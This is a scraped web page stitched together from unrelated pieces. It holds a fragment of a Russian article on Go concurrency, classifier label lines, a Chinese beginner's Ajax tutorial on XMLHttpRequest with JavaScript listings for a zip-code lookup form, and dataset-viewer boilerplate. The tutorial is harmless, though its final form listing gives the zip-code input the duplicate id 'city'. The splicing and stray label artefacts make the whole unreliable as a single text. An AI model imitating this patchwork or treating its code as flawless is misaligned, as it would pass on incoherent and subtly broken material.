use List::Util qw{ sum }; sub L() { 0} # left sub R() { 1} # right sub remainder_halves { my $in = shift; my $ar ; @$ar = sort { $b <=> $a } @$in; die "bounds error" if @$ar && $$ar[-1] < 0; my @ans = ( [], [] ); # halves for answer no warnings 'uninitialized'; # summing empty arrays my ( $targ, $other ) = ( L, R ); my ( $halfsize) = int((@$ar+1)/2); while ( @$ar ) { while ( sum( @{$ans[$targ]}) <= sum( @{$ans[$other]}) && @{$ans[$targ]} < $halfsize ) { push @{$ans[$targ]}, shift @$ar; } ( $targ, $other ) = ( $other, $targ); push @{$ans[$targ]}, shift @$ar if @{$ans[$targ]} < $halfsize; } my $score = abs( sum( @{ $ans[L] } ) - sum( @{ $ans[R] } ) ); return $score, $ans[L], $ans[R]; }
Be well,
rir
Comment on Re^2: partition of an array
Select or Download Code
Re^3: partition of an array
by BrowserUk (Pope) on Apr 23, 2009 at 03:30 UTC
No, neither of us should do that. :-) I should have just well enough alone with my brute force solution.
I tested my "quick" version with every data set in this thread and more; and managed to miss sequences like: 550, 450, 360, 340, 300. Oh well, I'll be more perspicacious tomorrow. Ha!
Be well,
rir
Log In?
Username:
Password:
What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://759178]
help
Chatterbox?
and the web crawler heard nothing...
How do I use this? | Other CB clients
Other Users?
Others meditating upon the Monastery: (14)
As of 2014-08-22 13:30 GMT
Sections?
Information?
Find Nodes?
Leftovers?
Voting Booth?
The best computer themed movie is:
Results (158 votes), past polls
|
__label__pos
| 0.609444 |
Timezone settings?
Hi,
I have a function which includes a line similar to this
new Date(1530215497000) (The epoch datestamp used here is an example)
and al though the server on which Node-red runs is set to the correct timezone, it is not respected and (since I’m in GMT +2) is consistently 2 hours off.
What am I missing here or what else can I do to fix this?
cheers
If you set the payload to that and pass it to a debug node what does it show and what do you expect it to show?
Please copy/paste the complete string it shows or paste a screenshot.
What server are you running on?
What version of node-red?
What version of nodejs?
Thanks!
It shows this 2018-06-29T08:57:30.000Z for new Date(1530262650000) and I would like it to say the correct time (as the Chrome console does when I run that same command) -> Fri Jun 29 2018 10:57:30 GMT+0200
Running on ARMBIAN 5.38 stable Debian, latest Node-Red en node is v8.11.3
This might help https://www.digitalocean.com/community/tutorials/understanding-date-and-time-in-javascript
What do you get from new Date()?
1 Like
Those two times are identical. The Z means it is showing it in UTC, the GMT+0200 means it is showing it in that timezone. It is just a matter of how you choose to display it, they are both the same time. If you want to display it on the dashboard (or elsewhere) in a particular or local timezone then you can use the Moment node to format it as you wish.
what does the command
dpkg-reconfigure tzdata
return?
A configuration utility. Set to Europe, Amsterdam.
Thanks. So Node-Red provides no local timezone functionalities itself then?
That is interesting, I would have expected the debug node output to display in local time of, I think, the server, but perhaps it is the browser. Are you running the browser on the same machine as node-red?
You can find more timezones here:
https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
|
__label__pos
| 0.977624 |
Tell me more ×
MathOverflow is a question and answer site for professional mathematicians. It's 100% free, no registration required.
Let $R \subset X \times Y$ be any relation between sets $X$ and $Y$. CH Dowker constructed two simplicial complexes $K$ and $L$ associated to $R$:
1. a simplex in $K$ consists of finitely many elements $x \in X$ such that there exists a single $y \in Y$ with $(x,y) \in R$, and
2. a simplex in $L$ consists of finitely many elements $y \in Y$ such that there exists a single $x \in X$ with $(x,y) \in R$.
Clearly, these are simplicial complexes. The main theorem of Dowker is the construction of a natural isomorphism of homology groups of $K$ and $L$. There is even a proof outline on nlab. In fact there is a homotopy equivalence between the geometric realizations although that requires an ordering on the simplices and is therefore not natural. This may be found in the paper
C. H. Dowker, Homology Groups of Relations, Annals of Math, 56, (1952), 84–95.
The goal of this paper was to prove equivalence of Cech, Vietoris and Alexander (co)homology theories. My question is
What other applications (if any) have been found for this theorem?
In particular, the fact that the relation itself creates the simplicial complexes seems to make this theorem have very limited uses beyond the consequences proved already by Dowker: I can't seem to find much on the internet at least. I wonder if the experts have some idea...
share|improve this question
add comment
1 Answer
up vote 7 down vote accepted
There is a considerable literature on `applications' of Dowker's result to sociology. This is sometimes doubtful in its depth! The development was started by R. Atkin.
As an example look at
http://www.ehu.es/ccwintco/uploads/1/11/Blanca-Cases-Q-analysis.pdf
As an offshoot of this there is fairly recent work in discrete maths (see work by Hélène Barcelo). I will not try to describe this other than saying it looks at an idea of the connectivity of a relation.
Back in the world of algebraic topology, it provides a way of proving that the pro-object in the homotopy category of simplicial sets, that is given by the Cech complex construction is in fact homotopy coherent. This provides a way of linking strong shape theory to the original form of shape theory. (It is not hard to prove this coherence directly although I only know one proof that has been written down in a thesis of one of my ex-students.)
(Edit: I forgot another example. You start with a group, $G$, and a family of subgroups, and ask to what extent invariants of the family give you invariants of the big group. This was the subject of a paper by Abels and Holz (Higher generation by subgroups , J. Alg, 160, (1993), 311– 341.) The family generates a covering of $G$ by its cosets. The two complexes given by that covering allow proof to be shortened and also in certain circumstances for links to Volodin's alegrbaic K-theory to be given.)
share|improve this answer
add comment
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.661796 |
LINK error
I’m doing an OpenGL game and i can’t compile my code because of a linkage error i’m getting.
The code compiled many times before and worked flawlessly, but i modified some stuff, and now its just that 1 link error.
“supfile.obj : error LNK2001 : unresolved external symbol _auxDIBImageLoadA@4”
I use a function called “auxDIBImageLoad(LPCTSTR)” and it used to work just fine. This function is in <gl\glaux.h> and i am importing it in this file.
Someone please tell me what is wrong.
of course you also imported glaux.lib (or whatever its name is) in your project, didn’t you?
BTW, AUX is notoriously outdated and unsupported. I would recommend you to use something else to handle image loading.
I did include glaux.lib, and it still doesn’t work. If I was to not use that function at all, what function is there to load a bitmap and detect the size automatically?
I just need something to load a bitmap without having me define the size of it. (i’m using it as a texture)
are you mixing C and C++ in some way? name decoration could prevent the linker from finding the function in the lib.
you could try DevIL (www.imagelib.org), or simply write your bmp loader and image resizing routine.
|
__label__pos
| 0.688428 |
Loren on the Art of MATLAB
Turn ideas into MATLAB
Note
Loren on the Art of MATLAB has been archived and will not be updated.
New Ways With Random Numbers, Part II
Once again we're going to hear from guest blogger Peter Perkins, who is a statistical software developer here at The MathWorks.
Contents
Last time, I showed a few ways to reproduce the values coming from MATLAB's random number generators. But sometimes what's needed is the "opposite of reproducibility" - you want to make sure that different runs of a simulation use different random inputs, because you want to be able to assume that the different runs are statistically independent. That's today's subject.
Using Seeds to Get Different Results
Remember seeds from my last post? I talked about reproducibility. If you create a random number stream with the same seed, you'll get the same sequence of values every time. But just as important, if you create different streams using different seeds, you'll get different sequences.
When MATLAB starts, it creates the default stream with commands equivalent to
stream0 = RandStream('mt19937ar','Seed',0)
stream0 =
mt19937ar random stream
Seed: 0
RandnAlg: Ziggurat
We saw that last week. To get a different sequence of random values, I can create a new stream with a different seed, such as
stream1 = RandStream('mt19937ar','Seed',1)
stream1 =
mt19937ar random stream
Seed: 1
RandnAlg: Ziggurat
Next I'll make it the default stream.
RandStream.setDefaultStream(stream1);
By setting stream1 as the default stream, I've made it so that rand, randn, and randi will use that stream from now on, and will draw values from a different sequence than they did when using stream0. Just to confirm that I've changed the default stream,
stream1 == RandStream.getDefaultStream()
ans =
1
In practice, I might have created the new stream on a second processor, to run in parallel with the first, or created it in a second MATLAB session on the same processor. It doesn't matter, either way works the same.
One common use of seeds is to get different random values each time you start up MATLAB without having to think about it every time. To do that, you can base the seed on the system clock.
mystream = RandStream('mt19937ar','Seed',sum(100*clock))
mystream =
mt19937ar random stream
Seed: 210226
RandnAlg: Ziggurat
RandStream.setDefaultStream(mystream);
Bear in mind that you won't be able to reproduce your results later on unless you hang onto the value of sum(100*clock). Doh!
You might wonder what value you should use for a seed, and if you will somehow add "extra randomness" into MATLAB by using the system clock. The answer is, you won't. In fact, taking this strategy to the extreme and reseeding a generator before each call will very likely do bad things to the statistical properties of the sequence of values you end up with. There's nothing wrong with choosing widely-spaced seeds, but the's no real advantage.
Remember, seeding a stream is not something you want to do a lot of. It's most useful if you use it as an initialization step, perhaps at MATLAB startup, perhaps before running a simulation.
Using Multiple Independent Streams
A reasonable question to ask at this point is, "If you can't tell me how far apart or what in order the different seeds are in the sequence of random values, how do I know that two simulation runs won't end up reusing the same random values?" The answer is, "You don't." Practically speaking, the state space of the Mersenne Twister used in the example above is so ridiculously much larger (2^19937 elements) than the number of possible seeds (2^32) that the chances of overlap in different simulation runs are pretty remote unless you use a large number of different seeds. But there is a more subtle potential problem - not enough is known about the statistical (pseudo)independence of sequences of values corresponding to different "seeds" of the Mersenne Twister generator.
There is a better way available in MATLAB R2008b: two new generator algorithms support multiple independent streams. That is, you can create separate streams that are guaranteed to not overlap, and for which tests that demonstrate (pseudo)independence of the values not only within each stream, but between streams, have been carried out. Notably, the Mersenne Twister ('mt19937ar') does not support multiple streams.
The two generator types that support multiple independent streams are the Combined Multiple Recursive ('mrg32k3a') and the Multiplicative Lagged Fibonacci ('mlfg6331_64') generators (the doc has references.) I'll create one of the former, and make it the default stream.
cmrg1 = RandStream.create('mrg32k3a','NumStreams',2,'StreamIndices',1);
RandStream.setDefaultStream(cmrg1)
The first parameter, NumStreams, says how many independent streams I plan on using, in total. StreamIndices says which one (or which ones) I actually want to create right now. Note that I've used the RandStream.create factory method, which allows for creating multiple streams as a group, and that the display for this stream
cmrg1
cmrg1 =
mrg32k3a random stream (current default)
StreamIndex: 1
NumStreams: 2
Seed: 0
RandnAlg: Ziggurat
indicates that it is part of a larger group (even though I have not yet created the second stream).
Let's say I've made one run of a simulation using the above as the default stream, represented by these 100,000 random values.
x1 = rand(100000,1);
Now I want to make a second, independent simulation run. If the runs are short enough, I might just run one after another in the same MATLAB session, without modifying the state of the default stream between runs. Since successive values coming from a stream are statistically independent, there's nothing at all wrong with that. On the other hand, if I want to shut down MATLAB between runs, or I want to run on two machines in parallel, that isn't going to work.
What I can do, though, is to create the second of my two independent streams, and make it the default stream.
cmrg2 = RandStream.create('mrg32k3a','NumStreams',2,'StreamIndices',2)
RandStream.setDefaultStream(cmrg2)
x2 = rand(100000,1);
cmrg2 =
mrg32k3a random stream
StreamIndex: 2
NumStreams: 2
Seed: 0
RandnAlg: Ziggurat
Let's look at the correlation between the two streams.
corrcoef(x1,x2)
ans =
1 0.0015578
0.0015578 1
That isn't by any means proof of statistical independence, but it is reassuring. In fact, much more thorough tests have been used to demonstrate between-stream independence of these generators.
As long as the streams are created correctly, it doesn't matter where or when I make the second simulation run, the results will still be independent from the first run. 'mrg32k3a' and 'mlfg6331_64' both support a huge number of parallel independent streams, and each stream is itself very, very long, so you can use multiple independent streams for very large simulations.
Using Substreams to Get Different Results
Remember substreams from my last post? I promised to explain why they're different than seeds, so here it is. Unlike seeds, which are located who-knows-where, who-knows-how-far-apart along the sequence of random numbers, the spacing between substreams is known, so any chance of overlap can be eliminated. And like independent parallel streams, research has been done to demonstrate statistical independence across substreams. In short, they are a more controlled way to do many of the same things that seeds have traditionally been used for, and a more lightweight solution than parallel streams.
Substreams provide a quick and easy way to ensure that you get different results from the same code at different times. For example, if I run this loop (from the last post)
defaultStream = RandStream.getDefaultStream();
for i = 1:5
defaultStream.Substream = i;
z = rand(1,i)
end
z =
0.32457
z =
0.25369 0.3805
z =
0.22759 0.34154 0.61441
z =
0.0054898 0.12139 0.70173 0.15851
z =
0.51784 0.37283 0.54639 0.14839 0.89321
and then run off to the Tahiti, and then come back (maybe), I can run this loop
for i = 6:10
defaultStream.Substream = i;
z = rand(1,11-i)
end
z =
0.48889 0.46817 0.62735 0.14538 0.84446
z =
0.66568 0.11152 0.035575 0.013499
z =
0.60589 0.28911 0.74664
z =
0.24981 0.78979
z =
0.25271
and be certain that I've generated random values independently of the first set of 5 iterations, and in fact have gotten exactly the same results as if I had never gone to Tahiti (though not gotten as good of a tan):
for i = 1:10
defaultStream.Substream = i;
z = rand(1,min(i,11-i));
end
As always, I might run the second loop at a different time than the first, but on the same machine, or run it at the same time on a different machine. As long as the stream is set up correctly, it makes no difference.
Being a Good Random Citizen of MATLAB Nation
It's important to remember that replacing the default stream, or changing its state, either by resetting it, by setting its state directly, or by positioning it to a new substream, affect all subsequent calls to rand, randn, and randi, and are things you should be careful about doing. If code you write is used by someone else who has no idea that you've done one of those things, your code may unintentionally invalidate the results of their simulation by affecting the statistical properties of the random numbers they use, or make it difficult for them to reproduce their results when they need to.
In general, I recommend leaving control of the default stream up to the end user as much as possible. If you are your own end user, it might be a good idea to execute "stream control" statements only at MATLAB startup, or only right before running a simulation.
In code that will be called by others, it's safe to generate values using the default stream, with no effect on the statistical properties of other random numbers generated in other parts of the code. But if possible, don't otherwise change the default stream's state or configuration by doing things like resetting or replacing the default stream. It's safest if those kinds of operations are done only by, or at the specific request of, the end user, so that it's clear when they are happening.
When that's not possible, if you need to somehow modify the default stream's state, consider "cleaning up after yourself" by saving and restoring the state before and after your code does whatever it needs to do. For example,
defaultStream = RandStream.getDefaultStream();
savedState = defaultStream.State;
% some use of the default stream and its state
defaultStream.State = savedState;
makes it as if your code did not modify the default stream at all.
Alternatively, consider using a "private stream", one that you create and draw values from without affecting the default stream. For example.
mystream = RandStream('mt19937ar','Seed',sum(100*clock));
x = rand(mystream,100,1);
generates values completely separately from the default stream. That call to rand (the method not the function) uses your private stream, not the default stream. Another possibility is to make the private stream the default, but only temporarily. For example,
mystream = RandStream('mt19937ar','Seed',sum(100*clock));
savedStream = RandStream.getDefaultStream();
RandStream.setDefaultStream(mystream);
% some use of the (new) default stream and its state
RandStream.setDefaultStream(savedStream);
allows your code to use your stream as the default, but also puts things back just as they were originally.
Other Situations?
Do the examples I've covered leave out any situations involving reproducibility of random numbers, or "the opposite or reproducibility", that you've run into? Let me know here.
Published with MATLAB® 7.7
• print
评论
要发表评论,请点击 此处 登录到您的 MathWorks 帐户或创建一个新帐户。
|
__label__pos
| 0.727116 |
Dismiss Notice
Join Physics Forums Today!
The friendliest, high quality science and math community on the planet! Everyone who loves science is here!
How do I write an integral from a to b in latex?
1. Sep 20, 2012 #1
As the title suggests, I can only see how to write an integral like:
f295b3970fadc2992246787a7ca45c16.png
But how would I write an integral like the following?
1845918e723ad0b5874fa2fb77870925.png
2. jcsd
3. Sep 20, 2012 #2
AlephZero
User Avatar
Science Advisor
Homework Helper
Put a subscript and a superscript on the \int, e.g. \int_{a}^{b}
4. Sep 20, 2012 #3
Oh, argh! Why didn't I think of that? Anyway, thanks :)
5. Sep 20, 2012 #4
6. Sep 20, 2012 #5
micromass
User Avatar
Staff Emeritus
Science Advisor
Education Advisor
2016 Award
7. Sep 21, 2012 #6
LCKurtz
User Avatar
Science Advisor
Homework Helper
Gold Member
Also, if you see an example of what you want to do, just right click on it and select to show math as Tex commands to see the code. You can copy/paste from that.
8. Mar 7, 2013 #7
how do i make the size and font look like that iwth latex? is that latex or a link to an image?
9. Mar 7, 2013 #8
It's just an image.
10. Mar 7, 2013 #9
jtbell
User Avatar
Staff: Mentor
Here's the actual LaTeX for phosgene's two integrals:
$$F = \int {f(x) dx}$$
$$\int_a^b {f(x) dx}$$
The right-click trick should work on those. Or control-click if you're using a Mac, like I am.
11. Mar 7, 2013 #10
Mark44
Staff: Mentor
As long as the subscripts/superscripts are single characters, as in the above, you can omit the braces around the sub-/superscript. The following will render exactly the same:
\int_a^b
When there are two or more characters (e.g. 2x, -3, etc.) you need the braces around the entire expression, as in this example:
\int_{-2}^{3x}
12. Mar 7, 2013 #11
mine looks smaller for some reason.
[itex]\int_a^b {f(x) dx}[/itex]
13. Mar 7, 2013 #12
robphy
User Avatar
Science Advisor
Homework Helper
Gold Member
tex [tex] \int_a^b {f(x) dx}[/tex]
itex [itex] \int_a^b {f(x) dx}[/itex]
itex with \displaystyle [itex] \displaystyle\int_a^b {f(x) dx}[/itex]
Know someone interested in this topic? Share this thread via Reddit, Google+, Twitter, or Facebook
Similar Discussions: How do I write an integral from a to b in latex?
1. How do I? (Replies: 3)
2. How do i (Replies: 1)
3. How do i unsubscribe? (Replies: 6)
Loading...
|
__label__pos
| 0.974797 |
What is Metaverse? Learn with the Metaverse’s growth!
What is Metaverse? We see many phrases that have previously been created and are subsequently developed in the form of technology, which is true, as we are familiar with concepts like multiverse and metaverse, but there is still progress in technical terms. Or, to put it another way, he is progressing. What is the Metaverse, exactly? This is recognized.
What is Metaverse
What is Metaverse
Economics spanning from business to marketing are among the technologies now claimed to be capable of facilitating human activities, particularly in the setting of the digital age.
We may also think of the Metaverse notion as a portal to the virtual world. Which we surely view as being intimately tied to the digital world in the future. Because the digital world is inextricably tied to technology (such as digital gadgets like mobile phones that are necessary in everyday life), and because such technology will intensify the desire to achieve everything in the future.
What is Metaverse? To grasp this, we must first learn several things, such as its history and how it works, which is dependent on the sophistication of this technology. What is the significance of the metaverse notion in human life? All of these things must be thoroughly understood. That is why you should continue reading.
What is Metaverse?
The term “metaverse” is a combination of two words: “meta” and “universe.” It would be two words: “meta,” which means “beyond or beyond,” and “universe,” which means “universe.” Both of these terms are derived from Greek and mean “outside the universe” or “beyond the universe.”
The phrase “metaverse” initially arose more than 30 years ago, in the early 1990s. At the time, the metaverse was viewed as a technique of connecting humans (society) to the notion of avatars, which was primarily reliant on technology.
Please keep in mind that there are three major aspects in this metaverse virtual environment.
1. Blockchain technology
2. virtual reality (VR) and artificial intelligence (AI)
3. web 3.0 technologies
There are now a number of well-known corporations involved in the Metaverse realm. From Samsung to Microsoft, Meta (formerly Facebook), Google, and Adidas. In addition, numerous businesses throughout the world are preparing to expand into the virtual world.
What is Metaverse
How experts define
Several experts have characterized the metaverse as they see it. The metaverse, according to Weston (2022), “A shared online virtual environment, comparable to video games like Second Life or Pokémon Go, is referred to as the metaverse. It is a realistic three-dimensional world in which individuals interact with one another in real time.” Search and talk.
Meanwhile, Stefanik (2022) stated that “the metaverse refers to an online 3D environment that may be accessible via computers, smart devices, augmented reality, and virtual reality headsets.” The metaverse principles are based on interaction and involvement. guaranteeing that users may completely immerse themselves in the online world made possible by Metaverse technology
Metamandril (2022) speculates that the metaverse is the notion of the online world combining with the (physically) actual world to produce something new.
The metaverse idea would usually make use of a few gadgets, such as virtual reality headgear and augmented reality apps. We can later explore new realms using 3D-based settings, called 3 dimensions.
In other words, the notion of this metaverse is only limited by the human imagination.
The Evolution of the Metaverse
In reality, this metaverse is evolving in tandem with the Internet’s more sophisticated evolution. This is because the metaverse exists alongside the virtual world, and its contents can only be “accessible” via the Internet.
Despite the fact that the word “metaverse” has been around since the 1990s, concrete proof will not be available until 2021. Following that, Facebook founder Mark Zuckerberg attempted to expand this virtual world. So, here is a look back at the history of the metaverse notion in the globe.
What is Metaverse
the growth of the internet
Tim Berners-Lee succeeded in developing the Internet in 1989. The metaverse was born with the early development of the Internet.
For the first time, the phrase “metaverse” arose.
The phrase “metaverse” originally featured in one of Neil Stephenson’s novels, Snow Crash, in 1992. In general, this novel discusses people as avatars who may interact with other avatars in 3D virtual space. This 3D virtual realm is seen as a metaphor or analogy to reality. The work is unique in that it illustrates how 3D virtual space exists.
The start of another life
In the Linden Lab, a scientist named Philip Rosedale and his colleagues built Second Life, an online virtual environment. Second Life is similar to a multiplayer online role-playing game in general, though Lyndon Lab claims their world is not a game.
Users would refer to themselves as Residents in this second life and have a virtual depiction of themselves. This virtual depiction is referred to as an avatar. Later, this avatar would be able to interact with locations, items, and even other avatars.
Roblox was made available to the general public.
The notion of the metaverse also applies to the gaming world. Roblox, one of the online gaming platforms, started virtual world games in 2006. Players in the game may construct and share their virtual environment with other players, resulting in transactions. This Roblox game production firm also provides a wide range of game genres, including role-playing, racing, and obstacle course games.
Start of Bitcoin
The presence of bitcoin is unquestionably a component of the metaverse notion. This is due to the fact that bitcoin is a cryptocurrency and blockchain. Later, crypto money would become a transactional instrument in this metaverse, from purchasing land, buildings, clothing, and other avatars.
The term “metaverse” returns.
The notion of the Metaverse was reintroduced to the public in 2011 with Ernest Cline’s novel Ready Player One. Overall, this work depicts reality in 2045 as a dreadful place from which the main character would enter the virtual world and study it. A bit of trivia: the novel was converted into a film with the same title in 2018.
Oculus production
Facebook purchased the hardware and virtual reality (VR) platform startup Oculus in 2014. Because VR technology will subsequently become a crucial element in the building of the Metaverse universe, Facebook purchased the firm. The majority of the display devices that are attached to the head to display the virtual world are created by the business Oculus.
Decentraland has been released.
One of the Metaverse systems, Decentraland, was successfully released in 2015. Developed by Esteban Orfano and Ari Mielich, whose virtual worlds have a lot of digital assets. This VR platform can also be used to purchase NFT (Non-Fungible Tokens).
The game Pokemon Go debuted.
Do you like the Pokemon Go game? What lengths have you gone to gather Pokemon Go characters? Well, the game has also been shown to have VR technology. Even though this game is no longer available, it demonstrates that we have “tasted” the notion of the metaverse through the gaming business.
fortnite
The Fortnite game, like Pokémon Go, is themed on the Metaverse reality. Unfortunately, you cannot obtain this game by downloading it from the PlayStore or AppStore, but only by visiting the website.
AXI Infinity
In addition to Pokémon Go and Fortnite, AXI Infinity is a game that continues the idea of the Metaverse universe in 2018.?
Two technological companies are developing the metaverse.
In 2021, two of the world’s largest technological corporations announced the creation of a metaverse universe. Yes, Microsoft and Facebook are the two technological corporations.
Microsoft is launching Mesh, a technology built for virtual collaboration across numerous devices. Meanwhile, Facebook has renamed its parent company “Meta” and intends to focus on constructing the metaverse virtual world.
How does the metaverse function?
With a little knowledge, it is also relatively simple to join the domain of the Metaverse. just log in and register with the platforms available, such as Decentraland. If you’ve already registered, you can enter the Metaverse with your current device.
As previously stated, this metaverse virtual environment may be accessed by using specialized equipment such as headphones, virtual reality glasses, and an internet connection. When we wish to play the game, it works practically exactly the same manner.
Learn about Metaverse’s efforts.
First, prepare some of these specialized instruments ahead of time. Remember that the internet network should be seamless so that you may enjoy the virtual world without stuttering. Devices, both software and hardware, will eventually comprehend human movements, noises, and words. When the gadget is finished, we will simply enter the virtual world and perform the same activities we do in real life, such as communicating, shopping, transacting, and buying.
Aside from the two gadgets already mentioned, there are others such as haptic gloves, robotic hands, and VR eyewear. Yes, the price range of these gadgets is rather costly, if the approach and good quality are considered.
So, what is metaverse? And information on how it operates, as well as the history of its development. Do you want to enter this virtual world with the assistance of the device?
Read Also :- The theory of relativity explained with special and general relativity.
Leave a Comment
|
__label__pos
| 0.556461 |
How many blogs? How many Facebook accounts?
How many social media entities does it take to spread one out over our species?
I am limited, having just five main email addresses I use actively, and maybe half a dozen blogs I maintain, only three Facebook profiles I update, not to forget the Pinterest and other social media sites that are updated automagically.
In the midst of that, I live and breathe.
What makes a greenhouse a living space or vice versa?
Can the word “punk” and the phrase “Waffle House” exist together? Yes, at Aretha Frankenstein’s in Chattanooga.
I say I want to be a hermit but I easily let a friend (well, not just any friend (the friend (she knows who she is))) get me back on social media with the only hesitation a five-hour daytime sleeping period to keep me on schedule with my night shift job, even on summer holiday.
I look down at my hands, observing the thinning skin, the early knotted knuckle signs of arthritis, the freckles and sunspots, wondering: will I live to 6th May 2050?
My thought structure passes through many phase shifts and subsets, pausing in Venn diagrams of interconnectedness, looking in all directions, asking myself: why am I asking myself questions, as if I’m not here with myself seeing me ask questions for which I already know the answers or already know I don’t know the answers?
Why do I pretend there is an Other/Not-Me which needs to see I already know the answers or already know I don’t know the answers?
Who am I? Who are we?
No, really.
When we know everything is grounded in reality but believe in magic/miracles/the unexplainable anyway…
Why?
We carry forward the successful thought patterns of our ancestors, regardless of its practical application today.
Sometimes as history (lest we forget the lessons our ancestors learned), sometimes as fairy tales/fantasy (as entertainment), sometimes as integral parts of our thought sets (because what worked in the past still works in the present/near future).
And if we could prove that thoughts do not exist in a vacuum, then what?
How do we extinguish the illusion of an independent person having independent thoughts?
How do we show that every one of us is just/miraculously a localised spinoff of stardust in motion?
How often should we tell, rather than show?
How long will it take for everyone to see the obvious?
And for/to what purpose?
Saving the species from/for itself, even if species is a concept that should lose it illusion powers?
What does a benign universe provide itself in the localised forms taken in our shapes?
Other than randomness?
We are random, no worries, there, because we also do not exist, despite ancestral teaching to the contrary.
It is here that a good joke is inserted to take our thought trails in a lighthearted direction:
Charles Schulz — “My life has no purpose, no direction, no aim, no meaning, and yet I’m happy. I can’t figure it out. What am I doing right?”
Leave a Reply
Fill in your details below or click an icon to log in:
WordPress.com Logo
You are commenting using your WordPress.com account. Log Out / Change )
Google photo
You are commenting using your Google account. Log Out / Change )
Twitter picture
You are commenting using your Twitter account. Log Out / Change )
Facebook photo
You are commenting using your Facebook account. Log Out / Change )
Connecting to %s
|
__label__pos
| 0.999966 |
Find a control inside the ItemTemplate on the client
1 posts, 0 answers
1. Telerik Admin
Telerik Admin avatar
1679 posts
Member since:
Oct 2004
Posted 28 Jul 2009 Link to this post
Requirements
RadControls version
RadControls for ASP.NET AJAX
.NET version
2.x and 3.x
Visual Studio version
2005/2008
programming language
JavaScript
browser support
all browsers supported by RadControls
GET REFERENCE TO AN ELEMENT INSIDE THE ITEM TEMPLATE
In some scenarios we need to get a reference to an item that is inside the Rotator's item template. For example we will get a reference to two types of objects - an HTML Image and an asp:Image control.
First we need to get a reference to the wrapper element. This element is used in the code in order to build the IDs of the controls that we want to refer to. The RadRotator's ItemTemplate is an ITemplate and the elements inside are renamed. For example if we have an asp:Image with ID="Image1" inside the template of a RadRotator with ID="RadRotator1", the ID of the image in the first item becomes RadRotator1_i0_AspImage1
Getting the wrapper element :
function getWrapperElement(rotatorItem)
var itemElem = rotatorItem.get_element();
var wrapper = itemElem.firstChild;
return wrapper;
Let us have the following setup, for example:
<div class="divBorder" style="float: left;"
<img alt="" id="HtmlImagePreview" src='' alt="HtmlImage" />
</div>
<div style="float: left;"
<telerik:RadRotator ID="RadRotator1" runat="server" DataSourceID="XmlDataSource1"
Width="100" ItemWidth="100" Height="200" ItemHeight="200" FrameDuration="5000"
ScrollDuration="2000" OnClientItemClicked="OnClientItemClicked"
<ItemTemplate>
<div style="width: 100px; height: 100px;"
<img alt="" id="HtmlImage1" src='<%# XPath("ImageURL") %>' />
</div>
<div style="width: 100px; height: 100px;"
<asp:Image ID="AspImage1" runat="server" ImageUrl='<%# XPath("ImageURL") %>' AlternateText="IMAGE" />
</div>
</ItemTemplate>
</telerik:RadRotator>
</div>
<div class="divBorder" style="float: left;"
<asp:Image ID="AspImagePreview" runat="server" ImageUrl='' AlternateText="AspImage" />
</div>
We implement two functions that can be used to find a specific item inside the ItemTemplate
1. Get a reference to an HTML element that is inside the ItemTemplate
function findHtmlElement(id, wrapperElement)
// Get the image ;
var image = $get(id, wrapperElement);
return image;
}
2. Get a reference to an Asp control that is inside the ItemTemplate :
function findAspControl(id, wrapperElement)
// Get the control ;
var control = $get(wrapperElement.id + "_" + id, wrapperElement);
return control;
}
Note that in case you need to find an AJAX enabled control you need to use the $find() function instead of the $get() one.
Then we could use these functions inside the OnClientItemClicked handler (for example) of the RadRotator control and get references to the elements that are inside the currently clicked rotator's item :
function OnRotatorItemClicked(oRotator, args)
// Get the wraper element ;
var wrapper = getWrapperElement(args.get_item());
// Find an asp control
var aspImageInsideTemplate = findAspControl("AspImage1", wrapper);
var aspImagePreview = $get("<%= AspImagePreview.ClientID %>");
aspImagePreview.src = aspImageInsideTemplate.src;
// Find an HTML element ;
var htmlImageInsideTemplate = findHtmlElement("HtmlImage1", wrapper);
var htmlImagePreview = document.getElementById("HtmlImagePreview");
htmlImagePreview.src = htmlImageInsideTemplate.src;
Back to Top
|
__label__pos
| 0.636066 |
Logo ROOT
Reference Guide
RanluxppEngineImpl.cxx
Go to the documentation of this file.
1// @(#)root/mathcore:$Id$
2// Author: Jonas Hahnfeld 11/2020
3
4/*************************************************************************
5 * Copyright (C) 1995-2021, Rene Brun and Fons Rademakers. *
6 * All rights reserved. *
7 * *
8 * For the licensing terms see $ROOTSYS/LICENSE. *
9 * For the list of contributors see $ROOTSYS/README/CREDITS. *
10 *************************************************************************/
11
12/** \class ROOT::Math::RanluxppEngine
13Implementation of the RANLUX++ generator
14
15RANLUX++ is an LCG equivalent of RANLUX using 576 bit numbers.
16
17The idea of the generator (such as the initialization method) and the algorithm
18for the modulo operation are described in
19A. Sibidanov, *A revision of the subtract-with-borrow random numbergenerators*,
20*Computer Physics Communications*, 221(2017), 299-303,
21preprint https://arxiv.org/pdf/1705.03123.pdf
22
23The code is loosely based on the Assembly implementation by A. Sibidanov
24available at https://github.com/sibidanov/ranluxpp/.
25
26Compared to the original generator, this implementation contains a fix to ensure
27that the modulo operation of the LCG always returns the smallest value congruent
28to the modulus (based on notes by M. Lüscher). Also, the generator converts the
29LCG state back to RANLUX numbers (implementation based on notes by M. Lüscher).
30This avoids a bias in the generated numbers because the upper bits of the LCG
31state, that is smaller than the modulus \f$ m = 2^{576} - 2^{240} + 1 \f$ (not
32a power of 2!), have a higher probability of being 0 than 1. And finally, this
33implementation draws 48 random bits for each generated floating point number
34(instead of 52 bits as in the original generator) to maintain the theoretical
35properties from understanding the original transition function of RANLUX as a
36chaotic dynamical system.
37*/
38
39#include "Math/RanluxppEngine.h"
40
41#include "ranluxpp/mulmod.h"
42#include "ranluxpp/ranlux_lcg.h"
43
44#include <cassert>
45#include <cstdint>
46
47namespace {
48
49// Variable templates are a feature of C++14, use the older technique of having
50// a static member in a template class.
51
52// The coefficients have been determined using Python, and in parts compared to the values given by Sibidanov.
53//
54// >>> def print_hex(a):
55// ... while a > 0:
56// ... print('{0:#018x}'.format(a & 0xffffffffffffffff))
57// ... a >>= 64
58// ...
59// >>> m = 2 ** 576 - 2 ** 240 + 1
60// >>> a = m - (m - 1) // 2 ** 24
61// >>> kA = pow(a, <w>, m)
62// >>> print_hex(kA)
63
64template <int p>
65struct RanluxppData;
66
67template <>
68struct RanluxppData<24> {
69 static const uint64_t kA[9];
70};
71// Also given by Sibidanov
72const uint64_t RanluxppData<24>::kA[] = {
